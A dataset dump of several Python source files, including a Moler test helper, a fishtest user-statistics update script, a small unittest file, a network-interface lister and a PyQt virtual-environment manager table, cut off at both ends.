call this function at the end of your test code with Moler.\n :return: None\n \"\"\"\n MolerTest._was_steps_end = True\n\n @staticmethod\n def error(msg, raise_exception=False, dump=None):\n \"\"\"\n Makes an error (fail the test) and (optional) continue the test flow.\n :param msg: Message to show.\n :param raise_exception: If True then raise an exception (if not in try except block then test will be\n terminated), if False then only show msg and mark error in logs.\n :param dump: If defined then dump object.\n :return: None.\n \"\"\"\n MolerTest._list_of_errors.append(msg)\n MolerTest._error(msg, raise_exception, dump)\n\n @staticmethod\n def info(msg, dump=None):\n \"\"\"\n Shows the message\n :param msg: Message to show.\n :param dump: If defined then dump object.\n :return: None.\n \"\"\"\n msg = MolerTest._get_string_message(msg, dump)\n MolerTest._logger.info(msg)\n\n @staticmethod\n def warning(msg, dump=None):\n \"\"\"\n Shows the message as warning.\n :param msg: Message to show.\n :param dump: If defined then dump object.\n :return: None\n \"\"\"\n msg = MolerTest._get_string_message(msg, dump)\n MolerTest._logger.warning(msg)\n\n @staticmethod\n def _dump(obj):\n \"\"\"\n Dumping objet to moler log.\n :param obj: Object to dump.\n :return: Dumped object as string\n \"\"\"\n msg_str = pprint.pformat(obj, indent=1)\n return msg_str\n\n @staticmethod\n def _get_string_message(msg, dump):\n if dump is not None:\n dump_str = MolerTest._dump(dump)\n msg = \"{}\\n{}\".format(msg, dump_str)\n\n return msg\n\n @staticmethod\n def sleep(seconds, quiet=False):\n \"\"\"\n Add sleep functionality\n TODO: add support to asyncio when runner ready\n :param seconds: Time to sleep (in seconds)\n :param quiet: If True then no info to log about sleeping, if False then sleep info will be logged\n :return:\n \"\"\"\n if not quiet:\n MolerTest.info(\"Sleep for {:.2f} seconds.\".format(seconds))\n time.sleep(seconds)\n\n @staticmethod\n def raise_background_exceptions(decorated=\"function\", check_steps_end=False):\n \"\"\"\n Decorates the function, method or class.\n :param decorated: Function, method or class to decorate.\n :param check_steps_end: If True then check if steps_end was called before return the method, if False then do\n not check\n :return: Decorated callable\n \"\"\"\n if callable(decorated):\n # direct decoration\n return MolerTest._decorate(decorated, check_steps_end=check_steps_end)\n else:\n return partial(MolerTest._decorate, check_steps_end=check_steps_end)\n\n # No public methods and fields below:\n\n _was_error = False\n _was_steps_end = False\n _logger = logging.getLogger(\"moler\")\n _list_of_errors = list()\n\n @staticmethod\n def _error(msg, raise_exception=False, dump=None):\n MolerTest._was_error = True\n msg = MolerTest._get_string_message(msg, dump)\n MolerTest._logger.error(msg, extra={'moler_error': True})\n\n if raise_exception:\n raise MolerException(msg)\n\n @staticmethod\n def _steps_start():\n err_msg = MolerTest._prepare_err_msg(None)\n MolerTest._list_of_errors = list() # clean the list for new test\n MolerTest._was_error = False\n MolerTest._was_steps_end = False\n if err_msg:\n prefix = \"Moler caught some error messages during execution. Please check Moler logs for details.\"\\\n \" List of them:\\n\"\n err_msg = \"{} {}\".format(prefix, err_msg)\n MolerTest._error(err_msg)\n\n @staticmethod\n def _prepare_err_msg(caught_exception):\n was_error_in_last_execution = MolerTest._was_error\n err_msg = \"\"\n\n unraised_exceptions = ConnectionObserver.get_unraised_exceptions(True)\n occured_exceptions = list()\n for unraised_exception in unraised_exceptions:\n occured_exceptions.append(unraised_exception)\n if caught_exception:\n occured_exceptions.append(caught_exception)\n\n if was_error_in_last_execution:\n err_msg += \"Moler caught some error messages during execution. Please check Moler logs for details.\\n\"\n if len(occured_exceptions) > 0:\n err_msg += \"There were unhandled exceptions from test caught by Moler.\\n\"\n for i, exc in enumerate(occured_exceptions, 1):\n try:\n import traceback\n exc_traceback = ' '.join(traceback.format_tb(exc.__traceback__))\n err_msg += \" {}) {}{}\\n\".format(i, exc_traceback, repr(exc))\n except AttributeError:\n err_msg += repr(exc)\n\n if len(MolerTest._list_of_errors) > 0:\n err_msg += \"Moler caught some error messages during execution:\\n\"\n\n for i, msg in enumerate(MolerTest._list_of_errors, 1):\n err_msg += \" {}) >>{}<<\\n\".format(i, msg)\n\n return err_msg\n\n @staticmethod\n def _check_exceptions_occured(caught_exception=None):\n err_msg = MolerTest._prepare_err_msg(caught_exception)\n\n if err_msg:\n MolerTest._error(err_msg)\n MolerTest._was_error = False\n MolerTest._list_of_errors = list()\n raise ExecutionException(err_msg)\n\n @staticmethod\n def _check_steps_end():\n if not MolerTest._was_steps_end:\n err_msg = \"Method 'steps_end()' was not called or parameter 'check_steps_end' was not set properly.\\n.\"\n MolerTest._error(err_msg)\n MolerTest._was_error = False\n raise ExecutionException(err_msg)\n\n @staticmethod\n def _decorate(obj=None, check_steps_end=False):\n # check that decorated function is not statimethod or classmethod\n if not obj:\n raise ExecutionException(\"Decorator for 'staticmethod' or 'classmethod' not implemented yet.\",\n )\n\n if hasattr(obj, \"__dict__\"):\n if obj.__dict__.items():\n for attributeName in dir(obj):\n if attributeName == \"_already_decorated\":\n break\n\n attribute = getattr(obj, attributeName)\n\n if not attributeName.startswith(\"_\"):\n if isinstance(attribute, (FunctionType, MethodType)):\n setattr(obj, attributeName, MolerTest._wrapper(attribute, check_steps_end=check_steps_end))\n else:\n obj = MolerTest._wrapper(obj, check_steps_end=check_steps_end)\n else:\n raise ExecutionException(\"No '__dict__' in decorated object.\")\n\n return obj\n\n @staticmethod\n def _wrapper(method, check_steps_end):\n if hasattr(method, '_already_decorated') and method._already_decorated:\n return method\n\n @wraps(method)\n def wrapped(*args, **kwargs):\n MolerTest._steps_start()\n caught_exception = None\n try:\n result = method(*args, **kwargs)\n except Exception as exc:\n caught_exception = exc\n finally:\n MolerTest._check_exceptions_occured(caught_exception)\n if check_steps_end:\n MolerTest._check_steps_end()\n gc.collect()\n return result\n\n wrapped._already_decorated = True\n return wrapped\n","sub_path":"moler/util/moler_test.py","file_name":"moler_test.py","file_ext":"py","file_size_in_byte":8359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"167983014","text":"#!/usr/bin/env python3\n\nimport sys\nfrom datetime import datetime, timedelta\n\nfrom fishtest.rundb import RunDb\nfrom fishtest.util import delta_date, diff_date, estimate_game_duration\nfrom pymongo import DESCENDING\n\nnew_deltas = {}\nskip = False\n\n\ndef process_run(run, info, deltas=None):\n global skip\n if deltas and (skip or str(run[\"_id\"]) in deltas):\n skip = True\n return\n if deltas is not None and str(run[\"_id\"]) in new_deltas:\n print(\"Warning: skipping repeated run!\")\n return\n if \"username\" in run[\"args\"]:\n username = run[\"args\"][\"username\"]\n if username in info:\n info[username][\"tests\"] += 1\n else:\n print(\"not in info:\", username)\n return\n\n tc = estimate_game_duration(run[\"args\"][\"tc\"])\n for task in run[\"tasks\"]:\n if \"worker_info\" not in task:\n continue\n username = task[\"worker_info\"].get(\"username\", None)\n if username is None:\n continue\n if username not in info:\n print(\"not in info:\", username)\n continue\n\n if \"stats\" in task:\n stats = task[\"stats\"]\n num_games = stats[\"wins\"] + stats[\"losses\"] + stats[\"draws\"]\n else:\n num_games = 0\n\n try:\n info[username][\"last_updated\"] = max(\n task[\"last_updated\"], info[username][\"last_updated\"]\n )\n info[username][\"task_last_updated\"] = max(\n task[\"last_updated\"], info[username][\"last_updated\"]\n )\n except (TypeError, KeyError) as e:\n # Comparison between a datetime and a string as \"6 hours ago\"\n info[username][\"last_updated\"] = task[\"last_updated\"]\n except Exception as e:\n print(\"Exception updating info[username]:\", e, sep=\"\\n\", file=sys.stderr)\n\n info[username][\"cpu_hours\"] += float(\n num_games * int(run[\"args\"].get(\"threads\", 1)) * tc / (60 * 60)\n )\n info[username][\"games\"] += num_games\n if deltas is not None:\n new_deltas.update({str(run[\"_id\"]): None})\n\n\ndef build_users(machines, info):\n for machine in machines:\n games_per_hour = (\n (machine[\"nps\"] / 1328000.0)\n * (3600.0 / estimate_game_duration(machine[\"run\"][\"args\"][\"tc\"]))\n * (int(machine[\"concurrency\"]) // machine[\"run\"][\"args\"].get(\"threads\", 1))\n )\n info[machine[\"username\"]][\"games_per_hour\"] += games_per_hour\n\n users = []\n for u in info.keys():\n user = info[u]\n try:\n # eg \"11 minutes ago\", \"6 hours ago\", \"Never\"\n if isinstance(user[\"last_updated\"], str):\n if \"task_last_updated\" in user:\n diff = diff_date(user[\"task_last_updated\"])\n user[\"diff\"] = diff.total_seconds()\n user[\"last_updated\"] = delta_date(diff)\n else:\n # eg \"2022-08-30 01:05:23.656000\", \"0001-01-01 00:00:00\"\n diff = diff_date(user[\"last_updated\"])\n user[\"diff\"] = diff.total_seconds()\n user[\"last_updated\"] = delta_date(diff)\n except Exception as e:\n print(\"Exception updating user['diff']:\", e, sep=\"\\n\", file=sys.stderr)\n users.append(user)\n\n users = [u for u in users if u[\"games\"] > 0 or u[\"tests\"] > 0]\n return users\n\n\ndef update_users():\n rundb = RunDb()\n\n deltas = {}\n info = {}\n top_month = {}\n\n clear_stats = True\n if len(sys.argv) > 1:\n print(\"scan all\")\n else:\n deltas = rundb.deltas.find_one()\n if deltas:\n clear_stats = False\n else:\n deltas = {}\n\n for u in rundb.userdb.get_users():\n username = u[\"username\"]\n top_month[username] = {\n \"username\": username,\n \"cpu_hours\": 0,\n \"games\": 0,\n \"tests\": 0,\n \"tests_repo\": u.get(\"tests_repo\", \"\"),\n \"last_updated\": datetime.min,\n \"games_per_hour\": 0.0,\n }\n if clear_stats:\n info[username] = top_month[username].copy()\n else:\n info[username] = rundb.userdb.user_cache.find_one({\"username\": username})\n if info[username]:\n info[username][\"games_per_hour\"] = 0.0\n else:\n info[username] = top_month[username].copy()\n\n for run in rundb.get_unfinished_runs():\n try:\n process_run(run, top_month)\n except Exception as e:\n print(\n \"Exception processing run {} for top_month:\".fnormat(run[\"_id\"]),\n e,\n sep=\"\\n\",\n file=sys.stderr,\n )\n\n # Step through these in small batches (step size 100) to save RAM\n step_size = 100\n\n now = datetime.utcnow()\n more_days = True\n last_updated = None\n while more_days:\n q = {\"finished\": True}\n if last_updated:\n q[\"last_updated\"] = {\"$lt\": last_updated}\n runs = list(\n rundb.runs.find(q, sort=[(\"last_updated\", DESCENDING)], limit=step_size)\n )\n if len(runs) == 0:\n break\n for run in runs:\n try:\n process_run(run, info, deltas)\n except Exception as e:\n print(\n \"Exception processing run {} for deltas:\".format(run[\"_id\"]),\n e,\n sep=\"\\n\",\n file=sys.stderr,\n )\n if (now - run[\"start_time\"]).days < 30:\n try:\n process_run(run, top_month)\n except Exception as e:\n print(\n \"Exception on run {} for top_month:\".format(run[\"_id\"]),\n e,\n sep=\"\\n\",\n file=sys.stderr,\n )\n elif not clear_stats:\n more_days = False\n last_updated = runs[-1][\"last_updated\"]\n\n if new_deltas:\n new_deltas.update(deltas)\n rundb.deltas.delete_many({})\n rundb.deltas.insert_many([{k: v} for k, v in new_deltas.items()])\n\n machines = rundb.get_machines()\n\n rundb.userdb.user_cache.delete_many({})\n users = build_users(machines, info)\n if users:\n rundb.userdb.user_cache.insert_many(users)\n rundb.userdb.user_cache.create_index(\"username\", unique=True)\n\n rundb.userdb.top_month.delete_many({})\n users_top = build_users(machines, top_month)\n if users_top:\n rundb.userdb.top_month.insert_many(users_top)\n\n # Delete users that have never been active and old admins group\n idle = {}\n for u in rundb.userdb.get_users():\n update = False\n while \"group:admins\" in u[\"groups\"]:\n u[\"groups\"].remove(\"group:admins\")\n update = True\n if update:\n rundb.userdb.save_user(u)\n if \"registration_time\" not in u or u[\n \"registration_time\"\n ] < datetime.utcnow() - timedelta(days=28):\n idle[u[\"username\"]] = u\n for u in rundb.userdb.user_cache.find():\n if u[\"username\"] in idle:\n del idle[u[\"username\"]]\n for u in idle.values():\n # A safe guard against deleting long time users\n if \"registration_time\" not in u or u[\n \"registration_time\"\n ] < datetime.utcnow() - timedelta(days=38):\n print(\"Warning: Found old user to delete:\", str(u[\"_id\"]))\n else:\n print(\"Delete:\", str(u[\"_id\"]))\n rundb.userdb.users.delete_one({\"_id\": u[\"_id\"]})\n\n print(\"Successfully updated {} users\".format(len(users)))\n\n # record this update run\n rundb.actiondb.update_stats()\n\n\nif __name__ == \"__main__\":\n update_users()\n","sub_path":"server/utils/delta_update_users.py","file_name":"delta_update_users.py","file_ext":"py","file_size_in_byte":7781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"464928210","text":"import unittest\nimport random\nimport functions_7_1 as fl\n\n\nclass MyTestCase(unittest.TestCase):\n def test_truth(self):\n s = 'SNDGFNRTJ'\n b = fl.truth(s)\n self.assertTrue(b.islower())\n self.assertFalse(s.islower())\n\n def test_in_rainbow(self):\n rainbow = ['red', 'orange', 'yellow', 'green', 'blue', 'magenta', 'violet']\n colors = rainbow\n color_1 = random.choice(colors)\n color_2 = fl.test_in()\n self.assertIn(color_1, rainbow)\n self.assertNotIn(color_2, rainbow)\n\n def test_greater(self):\n a = int(input())\n b = int(input())\n c = fl.greater(a, b)\n self.assertGreater(c, a)\n\n def test_less(self):\n length = 4\n word = fl.less()\n self.assertLess(len(word), length)\n\n def test_equal(self):\n comedians = {'Michel Palin', 'Terry Jones', 'Graham Chapman', 'John Cleese'}\n pythons = fl.equal()\n self.assertEqual(comedians, pythons)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"7_1 задача.py","file_name":"7_1 задача.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"467244079","text":"#\n# Copyright (C) 2013 Zane Thorn\n# Please view the README and LICENSE for more information\n# \n\n'''\nDetects network interfaces available on the machine. If the interface is a wifi\ninterface, it detects potential wifi networks, but does not scan or conenct to\nthem\n'''\n\nfrom util import *\nfrom host import Host\nfrom netifaces import *\nimport platform\nfrom network import *\nfrom ipaddress import ip_interface\n\n_protocol_names = {\n AF_LINK:'mac',\n AF_INET:'ip4',\n AF_INET6:'ip6'\n }\nfor p,n in address_families.items():\n if p not in _protocol_names:\n _protocol_names[p] = n\n\n_platform = platform.system()\nif _platform == 'Windows':\n import winreg\n def get_adapter_name(net_id):\n netkey = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,'SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\NetworkCards')\n\n child_count = winreg.QueryInfoKey(netkey)[0]\n for ix in range(child_count):\n child_name = winreg.EnumKey(netkey,ix)\n child_key = winreg.OpenKey(netkey,child_name)\n val_count = winreg.QueryInfoKey(child_key)[1]\n sets = {}\n for vix in range(val_count):\n val = winreg.EnumValue(child_key,vix)\n sets[val[0]] = val[1]\n if sets['ServiceName'] == net_id:\n return sets['Description']\n return net_id\n\nclass NetworkInterface(NetObject):\n def __init__(self,adapter,iface,name):\n self.adapter = adapter\n self.address = iface\n self.name = name\n self.network = Network(self)\n\n def connected(self):\n return not (self.address.is_link_local or self.address.is_loopback)\n\n def __str__(self):\n return self.name\n\nclass NetworkAdapter(NetObject):\n def __init__(self,name):\n self.id = name\n self.name = name\n if _platform == 'Windows':\n self.name = get_adapter_name(name)\n self._me = None\n self.ip4 = None\n self.ip6 = None\n self.reload()\n\n def reload(self):\n net_dict = ifaddresses(self.id)\n for protocol, data in net_dict.items():\n d = data[0]\n if protocol == AF_LINK:\n self.mac = d['addr']\n elif protocol == AF_INET:\n try:\n ip = d['addr']\n iface = ip_interface(ip)\n if 'netmask' in d:\n nmask =d['netmask']\n iface=ip_interface(ip+'/'+nmask)\n self.ip4 = NetworkInterface(self,iface,'ip4')\n except: pass\n elif protocol == AF_INET6:\n try:\n ip = d['addr']\n iface = ip_interface(ip)\n if 'netmask' in d:\n nmask =d['netmask']\n iface=ip_interface(ip+'/'+nmask)\n self.ip4 = NetworkInterface(self,iface,'ip6')\n except: pass\n\n def connected(self):\n if self.ip4 is not None:\n if self.ip4.connected():\n return True\n if self.ip6 is not None:\n if self.ip6.connected():\n return True\n return False\n \n def __str__(self):\n return self.name+' '+self.mac\n\n \n\ndef list_nics():\n return list(get(i) for i in interfaces())\n \ndef get(iface):\n return NetworkAdapter(iface)\n\ndef window(parent):\n raise NotImplemented()\n\ndef _main():\n print('Listing network devices and capabilities:')\n for nic in list_nics():\n if nic.connected():\n print(nic.name)\n print(nic.ip4)\n for host in nic.ip4.network:\n print(host)\n for port in host:\n print(port)\n\n\nif __name__ == '__main__':\n _main()\n","sub_path":"src/pea/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"453979655","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module contains the tables.\n\"\"\"\nimport webbrowser\nimport shutil\nimport os\nimport logging\nfrom functools import partial\n\nfrom PyQt5.QtGui import QIcon, QCursor\nfrom PyQt5.QtCore import pyqtSignal, QThread, QTimer\nfrom PyQt5.QtWidgets import (\n QStyle,\n QAction,\n QTableView,\n QMenu,\n QMessageBox,\n QFileDialog,\n QInputDialog\n)\n\nimport get_data\nimport creator\nfrom dialogs import ConsoleDialog, ProgBarDialog\nfrom creator import CloningWorker\nfrom manage_pip import PipManager\n\n\nlogger = logging.getLogger(__name__)\n\n\n\nclass BaseTable(QTableView):\n \"\"\"The base table for all tables.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.delete_icon = QIcon(\n self.style().standardIcon(QStyle.SP_TrashIcon)\n )\n self.info_icon = QIcon(\n self.style().standardIcon(QStyle.SP_FileDialogInfoView)\n )\n\n def get_selected_item(self):\n \"\"\"\n Get the item name of the selected row (index 0).\n \"\"\"\n listed_items = self.selectionModel().selectedRows()\n for index in listed_items:\n selected_item = index.data()\n return selected_item\n\n\n\nclass VenvTable(BaseTable):\n \"\"\"List the virtual environments found.\n \"\"\"\n started = pyqtSignal()\n finished = pyqtSignal()\n text_changed = pyqtSignal(str)\n refresh = pyqtSignal()\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.drive_icon = QIcon(\n self.style().standardIcon(QStyle.SP_DriveHDIcon)\n )\n self.delete_icon = QIcon(\n self.style().standardIcon(QStyle.SP_TrashIcon)\n )\n self.save_icon = QIcon(\n self.style().standardIcon(QStyle.SP_DialogSaveButton)\n )\n self.folder_icon = QIcon(\n self.style().standardIcon(QStyle.SP_DirOpenIcon)\n )\n\n self.progress_bar = ProgBarDialog()\n self.console = ConsoleDialog()\n self.thread = QThread(self)\n self.m_clone_repo_worker = CloningWorker()\n\n # thread\n self.thread.start()\n self.m_clone_repo_worker.moveToThread(self.thread)\n self.m_clone_repo_worker.started.connect(self.progress_bar.exec_)\n self.m_clone_repo_worker.finished.connect(self.progress_bar.close)\n self.m_clone_repo_worker.finished.connect(self.finish_info)\n\n # perform a proper stop using quit() and wait()\n self.thread.finished.connect(self.thread.quit)\n self.thread.finished.connect(self.thread.wait)\n\n\n def contextMenuEvent(self, event):\n context_menu = QMenu(self)\n\n # pop up only if clicking on a row\n if self.indexAt(event.pos()).isValid():\n context_menu.popup(QCursor.pos())\n\n # sub menus\n details_sub_menu = QMenu(\n \"Det&ails\",\n self,\n icon=self.info_icon\n )\n install_sub_menu = QMenu(\n \"&Install\",\n self,\n icon=QIcon.fromTheme(\"software-install\")\n )\n editable_sub_menu = QMenu(\n \"&Editable\",\n self,\n icon=QIcon.fromTheme(\"software-install\")\n )\n\n\n #]===================================================================[#\n #] ACTIONS [#========================================================[#\n #]===================================================================[#\n\n upgrade_pip_action = QAction(\n QIcon.fromTheme(\"system-software-update\"),\n \"&Upgrade Pip to latest\",\n self,\n statusTip=\"Upgrade Pip to the latest version\"\n )\n upgrade_pip_action.triggered.connect(\n lambda: self.upgrade_pip(event)\n )\n\n install_packages_action = QAction(\n \"Install &additional packages\",\n self,\n statusTip=\"Install additional packages\"\n )\n install_packages_action.triggered.connect(\n lambda: self.add_packages(event)\n )\n\n install_requires_action = QAction(\n \"Install from &requirements\",\n self,\n statusTip=\"Install packages from requirements\"\n )\n install_requires_action.triggered.connect(\n lambda: self.install_requires(event)\n )\n\n install_local_action = QAction(\n \"Install &local project\",\n self,\n statusTip=\"Install a local project\"\n )\n install_local_action.triggered.connect(\n lambda: self.install_local(event)\n )\n\n install_vsc_action = QAction(\n \"Install from &repository\",\n self,\n statusTip=\"Install from VSC repository\"\n )\n install_vsc_action.triggered.connect(\n lambda: self.install_vsc(event)\n )\n\n save_requires_action = QAction(\n self.save_icon,\n \"Save &requirements\",\n self,\n statusTip=\"Write requirements to file\"\n )\n save_requires_action.triggered.connect(\n lambda: self.save_requires(event)\n )\n\n list_packages_action = QAction(\n \"&List installed packages\",\n self,\n statusTip=\"List installed packages\"\n )\n list_packages_action.triggered.connect(\n lambda: self.list_packages(event, style=1)\n )\n\n list_freeze_action = QAction(\n \"Show &freeze output\",\n self,\n statusTip=\"List the output of 'pip freeze'\"\n )\n list_freeze_action.triggered.connect(\n lambda: self.freeze_packages(event, style=2)\n )\n\n list_deptree_action = QAction(\n \"Display &dependency tree\",\n self,\n statusTip=\"List dependencies with 'pipdeptree'\"\n )\n list_deptree_action.triggered.connect(\n lambda: self.deptree_packages(event, style=3)\n )\n\n open_venv_dir_action = QAction(\n self.folder_icon,\n \"&Open containing folder\",\n self,\n statusTip=\"Open the folder containing the virtual environment\"\n )\n open_venv_dir_action.triggered.connect(\n lambda: self.open_venv_dir(event)\n )\n\n delete_venv_action = QAction(\n self.delete_icon,\n \"&Delete environment\",\n self,\n statusTip=\"Delete environment\"\n )\n delete_venv_action.triggered.connect(\n lambda: self.delete_venv(event)\n )\n\n\n #]===================================================================[#\n #] MENUS [#==========================================================[#\n #]===================================================================[#\n\n context_menu.addAction(upgrade_pip_action)\n\n # install sub menu\n context_menu.addMenu(install_sub_menu)\n install_sub_menu.addAction(install_packages_action)\n install_sub_menu.addAction(install_requires_action)\n install_sub_menu.addAction(install_local_action)\n install_sub_menu.addAction(install_vsc_action)\n\n # details sub meun\n context_menu.addMenu(details_sub_menu)\n details_sub_menu.addAction(list_packages_action)\n details_sub_menu.addAction(list_freeze_action)\n details_sub_menu.addAction(list_deptree_action)\n\n context_menu.addAction(save_requires_action)\n context_menu.addAction(open_venv_dir_action)\n context_menu.addAction(delete_venv_action)\n\n\n def valid_version(self, venv_path):\n \"\"\"Test wether the Python version required is installed.\n \"\"\"\n cfg_file = os.path.join(venv_path, \"pyvenv.cfg\")\n is_installed = get_data.get_pyvenv_cfg(cfg_file, \"installed\")\n version = get_data.get_pyvenv_cfg(cfg_file, \"version\")\n py_path = get_data.get_pyvenv_cfg(cfg_file, \"py_path\")\n msg_txt = (\n f\"This environment requires {version} \\nfrom {py_path} which is \\nnot installed.\\n\"\n )\n\n if is_installed == \"no\":\n msg_box = QMessageBox(\n QMessageBox.Critical,\n \"Error\",\n msg_txt,\n QMessageBox.Ok,\n self\n )\n msg_box.exec_()\n return False\n return True\n\n\n def venv_exists(self, path):\n \"\"\"\n Test wether the directory of the selected environment actually exists.\n \"\"\"\n if os.path.exists(path):\n return True\n\n msg_box = QMessageBox(\n QMessageBox.Critical,\n \"Error\",\n \"Selected environment could not be found.\",\n QMessageBox.Ok,\n self\n )\n msg_box.exec_()\n self.refresh.emit()\n return False\n\n\n def has_pip(self, venv_dir, venv_name):\n \"\"\"Test if `pip` is installed.\n \"\"\"\n venv_path = os.path.join(venv_dir, venv_name)\n pip_binary = os.path.join(venv_path, \"bin\", \"pip\")\n has_pip = os.path.exists(pip_binary)\n\n if self.venv_exists(venv_path) and self.valid_version(venv_path):\n if has_pip:\n return True\n QMessageBox.information(\n self,\n \"Info\",\n \"This environment has no Pip installed.\"\n )\n return False\n return False\n\n\n def upgrade_pip(self, event):\n \"\"\"Run `pip install --upgrade pip` command.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n\n if self.has_pip(active_dir, venv):\n self.console.setWindowTitle(\"Updating Pip\")\n logger.info(\"Attempting to update Pip...\")\n\n self.manager = PipManager(active_dir, venv)\n self.manager.run_pip(creator.cmds[0], [creator.opts[0], \"pip\"])\n self.manager.started.connect(self.console.exec_)\n\n # display the updated output\n self.manager.textChanged.connect(self.console.update_status)\n\n # clear the content on window close\n if self.console.close:\n self.console.console_window.clear()\n\n\n def add_packages(self, event):\n \"\"\"\n Install additional packages into the selected environment.\n \"\"\"\n pass\n\n\n def install_requires(self, event):\n \"\"\"\n Install packages from a requirements file into the\n selected environment.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n\n if self.has_pip(active_dir, venv):\n file_name = QFileDialog.getOpenFileName(\n self,\n \"Select a requirements\"\n )\n file_path = file_name[0]\n\n if file_path != \"\":\n creator.fix_requirements(file_path)\n self.console.setWindowTitle(\"Installing from requirements\")\n logger.info(\"Installing from requirements...\")\n\n self.manager = PipManager(active_dir, venv)\n self.manager.run_pip(\n creator.cmds[0], [creator.opts[1], f\"'{file_path}'\"]\n )\n self.manager.started.connect(self.console.exec_)\n\n # display the updated output\n self.manager.textChanged.connect(self.console.update_status)\n\n # clear the content on window close\n if self.console.close:\n self.console.console_window.clear()\n\n\n def install_local(self, event):\n \"\"\"Install from a local project.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n\n if self.has_pip(active_dir, venv):\n project_dir = QFileDialog.getExistingDirectory(\n self,\n \"Select project directory\"\n )\n project_name = os.path.basename(project_dir)\n\n if project_dir != \"\":\n self.console.setWindowTitle(f\"Installing {project_name}\")\n logger.info(\"Installing from local project path...\")\n\n self.manager = PipManager(active_dir, venv)\n self.manager.run_pip(\n creator.cmds[0], [creator.opts[2], f\"'{project_dir}'\"]\n )\n self.manager.started.connect(self.console.exec_)\n\n # display the updated output\n self.manager.textChanged.connect(self.console.update_status)\n\n # clear the content on window close\n if self.console.close:\n self.console.console_window.clear()\n\n\n def install_vsc(self, event):\n \"\"\"Install from a VSC repository.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n venv_bin = os.path.join(active_dir, venv, \"bin\", \"python\")\n\n if self.has_pip(active_dir, venv):\n url, ok = QInputDialog.getText(\n self,\n \"Specify VSC project url\",\n \"Enter url to repository:\" + \" \" * 65\n )\n\n if url != \"\":\n project_name = os.path.basename(url)\n project_url = f\"git+{url}#egg={project_name}\"\n cmd = (\n f\"{venv_bin} -m pip install --no-cache-dir -e {project_url}\"\n )\n self.progress_bar.setWindowTitle(f\"Installing {project_name}\")\n self.progress_bar.status_label.setText(\"Cloning repository...\")\n logger.info(f\"Installing {project_name}...\")\n\n wrapper = partial(\n self.m_clone_repo_worker.run_process, cmd\n )\n QTimer.singleShot(0, wrapper)\n\n\n def finish_info(self):\n \"\"\"\n Show an info message when the cloning process has finished successfully.\n \"\"\"\n msg_txt = (\n \"Successfully installed package \\nfrom VSC repository.\\n\"\n )\n QMessageBox.information(self, \"Done\", msg_txt)\n\n\n def save_requires(self, event):\n \"\"\"\n Write the requirements of the selected environment to file.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n venv_dir = os.path.join(active_dir, venv)\n\n if self.has_pip(active_dir, venv):\n save_file = QFileDialog.getSaveFileName(\n self,\n \"Save requirements\",\n directory=f\"{venv_dir}/requirements.txt\"\n )\n save_path = save_file[0]\n\n if save_path != \"\":\n logger.info(f\"Saving '{save_path}'...\")\n\n # write 'pip freeze' output to selected file\n self.manager = PipManager(active_dir, venv)\n self.manager.run_pip(creator.cmds[2], [\">\", save_path])\n\n # show an info message\n message_txt = (f\"Saved requirements in \\n{save_path}\")\n QMessageBox.information(self, \"Saved\", message_txt)\n\n\n def list_packages(self, event, style):\n \"\"\"\n Open console dialog and list the installed packages. The argument\n `style` controls which style the output should have: `style=1` for\n `pip list`, `style=2` for `pip freeze` and style=3 for a dependency\n output via `pipdeptree`.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n\n if self.has_pip(active_dir, venv):\n self.console.setWindowTitle(f\"Packages installed in: {venv}\")\n\n self.manager = PipManager(active_dir, f\"'{venv}'\")\n self.manager.run_pip(creator.cmds[style])\n self.manager.started.connect(self.console.exec_)\n\n # display the updated output\n self.manager.textChanged.connect(self.console.update_status)\n\n # clear the content on window close\n if self.console.close:\n self.console.console_window.clear()\n\n\n def freeze_packages(self, event, style):\n \"\"\"Print `pip freeze` output to console window.\n \"\"\"\n self.list_packages(event, style)\n\n\n def deptree_packages(self, event, style):\n \"\"\"\n Test if `pipdeptree` is installed and ask user wether to\n install it if it's not. Then call `self.list_packages()`\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n pipdeptree_binary = os.path.join(active_dir, venv, \"bin\", \"pipdeptree\")\n has_pipdeptree = os.path.exists(pipdeptree_binary)\n message_txt = (\n \"This requires the pipdeptree package\\nto be installed.\\n\\n\"\n \"Do you want to install it?\\n\"\n )\n\n if has_pipdeptree:\n self.list_packages(event, style)\n else:\n if self.has_pip(active_dir, venv):\n msg_box_confirm = QMessageBox.question(\n self,\n \"Confirm\",\n message_txt,\n QMessageBox.Yes | QMessageBox.Cancel\n )\n if msg_box_confirm == QMessageBox.Yes:\n self.progress_bar.setWindowTitle(\"Installing\")\n self.progress_bar.status_label.setText(\n \"Installing pipdeptree...\"\n )\n logger.info(\"Installing pipdeptree...\")\n\n self.manager = PipManager(active_dir, venv)\n self.manager.run_pip(\n creator.cmds[0], [creator.opts[0], \"pipdeptree\"]\n )\n self.manager.started.connect(self.progress_bar.exec_)\n self.manager.finished.connect(self.progress_bar.close)\n self.manager.process_stop()\n self.list_packages(event, style)\n\n\n def open_venv_dir(self, event):\n \"\"\"Open the selected venv directory.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n venv_dir = os.path.join(active_dir, venv)\n\n if 